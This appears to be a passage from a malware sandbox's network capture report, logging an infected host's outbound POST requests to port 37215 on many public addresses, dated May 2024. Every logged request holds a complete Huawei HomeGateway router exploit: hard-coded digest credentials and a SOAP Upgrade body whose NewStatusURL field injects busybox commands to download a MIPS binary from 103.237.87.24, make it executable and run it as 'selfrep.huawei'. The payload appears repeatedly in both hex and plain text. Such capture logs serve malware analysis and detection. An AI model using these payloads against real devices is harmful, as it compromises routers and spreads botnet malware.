6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  943192.168.2.1354784221.178.116.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.398241997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  944192.168.2.1349164160.212.238.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.398253918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  945192.168.2.134564441.110.255.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.398307085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  946192.168.2.1340140197.216.250.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400362968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  947192.168.2.1343574149.21.160.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400418997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  948192.168.2.1339922157.203.68.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400423050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  949192.168.2.134426225.250.235.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400450945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  950192.168.2.1352616197.105.46.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400466919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  951192.168.2.1351190157.71.8.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400513887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  952192.168.2.135265241.94.46.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400610924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  953192.168.2.135905441.34.52.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400623083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
